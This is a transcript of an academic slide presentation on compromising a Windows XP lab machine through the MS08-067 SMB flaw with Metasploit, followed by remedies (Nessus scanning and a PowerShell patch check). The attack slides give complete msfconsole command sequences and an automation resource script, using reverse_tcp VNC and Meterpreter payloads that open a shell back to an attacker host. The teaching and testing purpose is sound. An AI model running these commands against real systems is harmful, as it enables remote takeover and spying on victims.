windows xp compromise and remedies
TRANSCRIPT
Compromising Windows XP and Remedies
Bikrant Gautam, MSIA
St. Cloud State University
Overview
✘ Terminologies explained
✘ Deploying attack
✘ Automating attacks
✘ Mitigating measures
✘ Conclusion
Methodology Overview
Scanning
● Probe target
● Find vulnerabilities
● Pass information to exploit
Attacking
● Find target
● Find vulnerability
● Load exploit
● Load payload
● Set up listener
● Exploit
Targeting Victims
The victim: name bikrant1, IP 192.168.1.9
The attacker: the target is reported as vulnerable
Launching the Attack (visual)
Result ===>
Victim OS: everything the user does on this computer is visible to the attacker once the exploit is successful.
Attacking system: everything the victim does is seen from Kali Linux using the TightVNC console.
Exploit Code:
> sudo msfconsole
> use exploit/windows/smb/ms08_067_netapi
> set target 0
> set rhost 192.168.1.9
> set lhost 192.168.1.6
> set lport 4321
> set payload windows/vncinject/reverse_tcp
> check
> exploit
Attack continued (console): Using Meterpreter
Exploit Script
> sudo msfconsole
> use exploit/windows/smb/ms08_067_netapi
> set target 0
> set rhost 192.168.1.9
> set lhost 192.168.1.6
> set lport 4321
> set payload windows/meterpreter/reverse_tcp
> check
> exploit
● Different from the previous one
● Has access to the command line
● Can create, delete or even execute new scripts or commands
Automating the Attack
Using a bash script to automate the attack
Requirement:
> The script needs to be created in a specific folder of the Metasploit framework.
> Once written, the script can be invoked with the msfconsole command.
-----------------------------------------------------------------
> Go to location: /usr/share/metasploit-framework/scripts/meterpreter
> Create a file meterpreter.rc using nano or touch
> Include the following script:
use exploit/windows/smb/ms08_067_netapi
set target 0
set rhost 192.168.1.9
set lhost 192.168.1.10
set lport 4321
set payload windows/vncinject/reverse_tcp
exploit
Automating the Attack (2)
Using Python to automate the attack
Complex requirement:
> Need to download the correct library to initiate the attack.
> The package is msfrpc from GitHub.
> Executes similar actions as the bash script.
-----------------------------------------------------------------
Difference from the bash script:
> Difficult to implement.
> Depends on the Python version.
> Code cannot be run on another system without setting up the complete environment.
Initializing the attack
Preventing the Attack
Scanning for vulnerabilities using Nessus
> Scan the device (provide the IP to Nessus)
> Run the scan
> Drill down on the critical and high vulnerabilities
> Read the description and adopt the solution suggested
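One concrete check behind the "adopt the solution suggested" step, as an added example that is not part of the original slides: a PowerShell function that reports whether the host has the MS08-067 security update (KB958644) installed and whether the Server (SMB) service that ms08_067_netapi targets is running. It assumes Windows PowerShell is available on the host being checked; the function name is my own.

```powershell
# Added example (not from the slides): local exposure check for MS08-067.
# KB958644 is the Microsoft security update that fixes MS08-067; LanmanServer
# is the Server service that exposes SMB, which the exploit reaches over port 445.
function Test-Ms08067Exposure {
    # Get-HotFix queries Win32_QuickFixEngineering; a missing entry returns $null
    $patch = Get-HotFix -Id 'KB958644' -ErrorAction SilentlyContinue
    $smb   = Get-Service -Name 'LanmanServer' -ErrorAction SilentlyContinue

    $patchInstalled = [bool]$patch
    $smbRunning     = ($null -ne $smb) -and ($smb.Status -eq 'Running')

    [PSCustomObject]@{
        Host           = $env:COMPUTERNAME
        PatchInstalled = $patchInstalled
        SmbRunning     = $smbRunning
        # Reachable over the network only when unpatched AND the SMB service is up;
        # stopping the service is a stopgap, installing the update is the fix.
        Exposed        = (-not $patchInstalled) -and $smbRunning
    }
}

Test-Ms08067Exposure | Format-List
```

Run it on each host that Nessus flags for MS08-067 and again after patching to confirm that Exposed has turned to False.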
Conclusion
● Security is an evolving process.
● New vulnerabilities are introduced each day.
● Penetration testing and scanning help you see what's wrong with your system.
● Helps you understand what can be done once the exploit is executed.
● "The best defense can only be implemented once you know your weakest point."
Questions?